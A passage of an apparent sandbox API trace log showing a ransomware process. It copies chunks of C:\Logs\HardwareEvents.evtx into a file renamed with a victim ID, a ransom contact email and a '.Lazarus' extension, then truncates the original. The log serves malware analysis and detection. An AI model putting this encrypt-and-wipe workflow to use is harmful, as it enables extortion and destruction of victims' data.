Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0084.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0084.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0084.928] AreFileApisANSI () returned 1 [0084.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78950 [0084.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x78950, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0084.928] GetFileAttributesExW (in: lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78950 | out: hHeap=0x20000) returned 1 [0084.928] AreFileApisANSI () returned 1 [0084.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.928] GetLastError () returned 0x0 [0084.928] SetLastError (dwErrCode=0x0) [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0084.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0084.929] GetLastError () returned 0x0 [0084.929] SetLastError (dwErrCode=0x0) [0084.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0084.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0084.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.929] AreFileApisANSI () returned 1 [0084.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0084.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x51590 [0084.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x51590, cchWideChar=90 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 90 [0084.929] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\hardwareevents.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.050] GetFileType (hFile=0x424) returned 0x1 [0085.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.051] AreFileApisANSI () returned 1 [0085.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78e50 [0085.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0085.051] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.051] GetFileType (hFile=0x348) returned 0x1 [0085.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.051] GetLastError () returned 0x0 [0085.051] SetLastError (dwErrCode=0x0) [0085.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.051] GetLastError () returned 0x0 [0085.051] SetLastError (dwErrCode=0x0) [0085.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0085.051] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0085.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0085.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0085.373] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0085.373] GetLastError () returned 0x0 [0085.373] SetLastError (dwErrCode=0x0) [0085.374] GetLastError () returned 0x0 [0085.374] SetLastError (dwErrCode=0x0) [0085.374] GetLastError () returned 0x0 [0085.374] SetLastError (dwErrCode=0x0) [0085.374] GetLastError () returned 0x0 [0085.374] SetLastError (dwErrCode=0x0) [0085.374] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.374] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.375] GetLastError () returned 0x0 [0085.375] SetLastError (dwErrCode=0x0) [0085.375] GetLastError () returned 0x0 [0085.375] SetLastError (dwErrCode=0x0) [0085.376] GetLastError () returned 0x0 [0085.376] SetLastError (dwErrCode=0x0) [0085.376] GetLastError () returned 0x0 [0085.376] SetLastError (dwErrCode=0x0) [0085.376] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.376] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.376] GetLastError () returned 0x0 [0085.376] SetLastError (dwErrCode=0x0) [0085.376] GetLastError () returned 0x0 [0085.376] SetLastError (dwErrCode=0x0) [0085.376] GetLastError () returned 0x0 [0085.376] SetLastError (dwErrCode=0x0) [0085.377] GetLastError () returned 0x0 [0085.377] SetLastError (dwErrCode=0x0) [0085.377] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.377] GetLastError () returned 0x0 [0085.377] SetLastError (dwErrCode=0x0) [0085.377] GetLastError () returned 0x0 [0085.377] SetLastError (dwErrCode=0x0) [0085.377] GetLastError () returned 0x0 [0085.377] SetLastError (dwErrCode=0x0) [0085.377] GetLastError () returned 0x0 [0085.377] SetLastError (dwErrCode=0x0) [0085.378] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.378] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.378] GetLastError () returned 0x0 [0085.378] SetLastError (dwErrCode=0x0) [0085.378] GetLastError () returned 0x0 [0085.378] SetLastError (dwErrCode=0x0) [0085.378] GetLastError () returned 0x0 [0085.378] SetLastError (dwErrCode=0x0) [0085.378] GetLastError () returned 0x0 [0085.378] SetLastError (dwErrCode=0x0) [0085.378] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.379] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.379] GetLastError () returned 0x0 [0085.379] SetLastError (dwErrCode=0x0) [0085.379] GetLastError () returned 0x0 [0085.379] SetLastError (dwErrCode=0x0) [0085.379] GetLastError () returned 0x0 [0085.379] SetLastError (dwErrCode=0x0) [0085.379] GetLastError () returned 0x0 [0085.379] SetLastError (dwErrCode=0x0) [0085.379] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.379] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.380] GetLastError () returned 0x0 [0085.380] SetLastError (dwErrCode=0x0) [0085.380] GetLastError () returned 0x0 [0085.380] SetLastError (dwErrCode=0x0) [0085.380] GetLastError () returned 0x0 [0085.380] SetLastError (dwErrCode=0x0) [0085.380] GetLastError () returned 0x0 [0085.380] SetLastError (dwErrCode=0x0) [0085.380] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.380] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.380] GetLastError () returned 0x0 [0085.380] SetLastError (dwErrCode=0x0) [0085.381] GetLastError () returned 0x0 [0085.381] SetLastError (dwErrCode=0x0) [0085.381] GetLastError () returned 0x0 [0085.381] SetLastError (dwErrCode=0x0) [0085.381] GetLastError () returned 0x0 [0085.381] SetLastError (dwErrCode=0x0) [0085.381] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.381] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.381] GetLastError () returned 0x0 [0085.381] SetLastError (dwErrCode=0x0) [0085.381] GetLastError () returned 0x0 [0085.381] SetLastError (dwErrCode=0x0) [0085.382] GetLastError () returned 0x0 [0085.382] SetLastError (dwErrCode=0x0) [0085.382] GetLastError () returned 0x0 [0085.382] SetLastError (dwErrCode=0x0) [0085.382] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.382] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.382] GetLastError () returned 0x0 [0085.382] SetLastError (dwErrCode=0x0) [0085.382] GetLastError () returned 0x0 [0085.382] SetLastError (dwErrCode=0x0) [0085.382] GetLastError () returned 0x0 [0085.382] SetLastError (dwErrCode=0x0) [0085.383] GetLastError () returned 0x0 [0085.383] SetLastError (dwErrCode=0x0) [0085.383] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.383] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.383] GetLastError () returned 0x0 [0085.383] SetLastError (dwErrCode=0x0) [0085.383] GetLastError () returned 0x0 [0085.383] SetLastError (dwErrCode=0x0) [0085.384] GetLastError () returned 0x0 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] GetLastError () returned 0x0 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.384] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.384] GetLastError () returned 0x0 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] GetLastError () returned 0x0 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] GetLastError () returned 0x0 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] GetLastError () returned 0x0 [0085.385] SetLastError (dwErrCode=0x0) [0085.385] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.385] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.385] GetLastError () returned 0x0 [0085.385] SetLastError (dwErrCode=0x0) [0085.385] GetLastError () returned 0x0 [0085.385] SetLastError (dwErrCode=0x0) [0085.385] GetLastError () returned 0x0 [0085.385] SetLastError (dwErrCode=0x0) [0085.385] GetLastError () returned 0x0 [0085.385] SetLastError (dwErrCode=0x0) [0085.385] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.386] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.386] GetLastError () returned 0x0 [0085.386] SetLastError (dwErrCode=0x0) [0085.386] GetLastError () returned 0x0 [0085.386] SetLastError (dwErrCode=0x0) [0085.386] GetLastError () returned 0x0 [0085.386] SetLastError (dwErrCode=0x0) [0085.386] GetLastError () returned 0x0 [0085.386] SetLastError (dwErrCode=0x0) [0085.386] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.386] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.387] GetLastError () returned 0x0 [0085.387] SetLastError (dwErrCode=0x0) [0085.387] GetLastError () returned 0x0 [0085.387] SetLastError (dwErrCode=0x0) [0085.387] GetLastError () returned 0x0 [0085.387] SetLastError (dwErrCode=0x0) [0085.387] GetLastError () returned 0x0 [0085.387] SetLastError (dwErrCode=0x0) [0085.387] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.387] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.388] GetLastError () returned 0x0 [0085.388] SetLastError (dwErrCode=0x0) [0085.388] GetLastError () returned 0x0 [0085.388] SetLastError (dwErrCode=0x0) [0085.388] GetLastError () returned 0x0 [0085.388] SetLastError (dwErrCode=0x0) [0085.388] GetLastError () returned 0x0 [0085.388] SetLastError (dwErrCode=0x0) [0085.388] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.388] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.388] GetLastError () returned 0x0 [0085.388] SetLastError (dwErrCode=0x0) [0085.388] GetLastError () returned 0x0 [0085.389] SetLastError (dwErrCode=0x0) [0085.389] GetLastError () returned 0x0 [0085.389] SetLastError (dwErrCode=0x0) [0085.389] GetLastError () returned 0x0 [0085.389] SetLastError (dwErrCode=0x0) [0085.389] ReadFile (in: hFile=0x348, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0085.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0085.389] WriteFile (in: hFile=0x424, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0085.389] GetLastError () returned 0x0 [0085.389] SetLastError (dwErrCode=0x0) [0085.389] GetLastError () returned 0x0 [0085.389] SetLastError (dwErrCode=0x0) [0085.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0085.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0085.390] CloseHandle (hObject=0x424) returned 1 [0085.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0085.392] CloseHandle (hObject=0x348) returned 1 [0085.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.393] AreFileApisANSI () returned 1 [0085.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0085.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78e50 [0085.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0085.393] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.394] GetFileType (hFile=0x348) returned 0x1 [0085.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0085.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0085.394] GetLastError () returned 0xb7 [0085.394] SetLastError (dwErrCode=0xb7) [0085.395] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0085.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0085.395] CloseHandle (hObject=0x348) returned 1 [0085.396] AreFileApisANSI () returned 1 [0085.396] MultiByteToWideChar (in: CodePage=0x0, 